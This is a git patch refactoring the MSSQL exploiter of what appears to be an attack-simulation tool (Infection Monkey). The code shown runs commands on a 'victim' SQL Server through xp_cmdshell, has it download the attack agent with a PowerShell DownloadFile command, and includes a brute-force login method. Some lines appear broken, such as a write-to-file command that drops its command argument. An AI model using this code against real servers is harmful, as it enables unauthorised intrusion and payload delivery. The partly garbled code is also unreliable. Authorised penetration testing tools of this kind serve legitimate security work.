From 257c6b0b055a3beaeefcc1b7dc2d35301d81bf18 Mon Sep 17 00:00:00 2001 From: Mike Salvatore Date: Tue, 14 Jun 2022 12:32:29 -0400 Subject: [PATCH] Agent: Refactor MSSQL agent download command The first step in exploitation is to instruct the victim to download the agent. This commit refactors this code to remove the dependency on the MSSQLLimitedSizePayload. To do this, it introduces `_write_command_to_batch_file()` which will be reused by the agent execution command. --- monkey/infection_monkey/exploit/mssqlexec.py | 38 ++++++++++---------- 1 file changed, 19 insertions(+), 19 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 8b378f418..f80dc3db6 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -37,7 +37,6 @@ class MSSQLExploiter(HostExploiter): XP_CMDSHELL_COMMAND_START = "xp_cmdshell '" XP_CMDSHELL_COMMAND_END = "'" EXPLOIT_COMMAND_PREFIX = "{payload_file_path}" MONKEY_DOWNLOAD_COMMAND = ( "powershell (new-object System.Net.WebClient)." "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')" @@ -133,9 +132,8 @@ class MSSQLExploiter(HostExploiter): sleep(MSSQLExploiter.QUERY_BUFFER) def upload_monkey(self, monkey_path_on_victim: PureWindowsPath): - monkey_download_command = self.write_download_command_to_payload(monkey_path_on_victim) + self._write_download_command_to_batch_file(monkey_path_on_victim) self.run_payload_file() - self.add_executed_cmd(monkey_download_command.command) def remove_temp_dir(self): # Remove temporary dir we stored payload at @@ -159,10 +157,24 @@ class MSSQLExploiter(HostExploiter): http_thread.stop() http_thread.join(LONG_REQUEST_TIMEOUT) - def write_download_command_to_payload(self, monkey_path_on_victim: PureWindowsPath): - monkey_download_command = self.get_monkey_download_command(monkey_path_on_victim) - self.run_mssql_command(monkey_download_command) - return monkey_download_command + def _write_download_command_to_batch_file(self, monkey_path_on_victim: PureWindowsPath): + agent_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format( + http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim) + ) + self._write_command_to_batch_file(agent_download_command) + + def _write_command_to_batch_file(self, command: str): + write_to_file_command = f"{self.payload_file_path}" + self._run_mssql_command(write_to_file_command) + + # Note: This is a strangler used to replace self.run_mssql_command() + def _run_mssql_command(self, command: str): + logger.debug(f"Running command on SQL Server: {command}") + + self.cursor.execute(f"xp_cmdshell '{command}'") + self.add_executed_cmd(command) + + sleep(MSSQLExploiter.QUERY_BUFFER) def get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath): # Form monkey's launch command @@ -177,18 +189,6 @@ class MSSQLExploiter(HostExploiter): suffix=suffix, ) - def get_monkey_download_command(self, monkey_path_on_victim: PureWindowsPath): - monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format( - http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim) - ) - prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX - suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format( - payload_file_path=self.payload_file_path - ) - return MSSQLLimitedSizePayload( - command=monkey_download_command, suffix=suffix, prefix=prefix - ) - def brute_force(self, host, port, users_passwords_pairs_list): """ Starts the brute force connection attempts and if needed then init the payload process.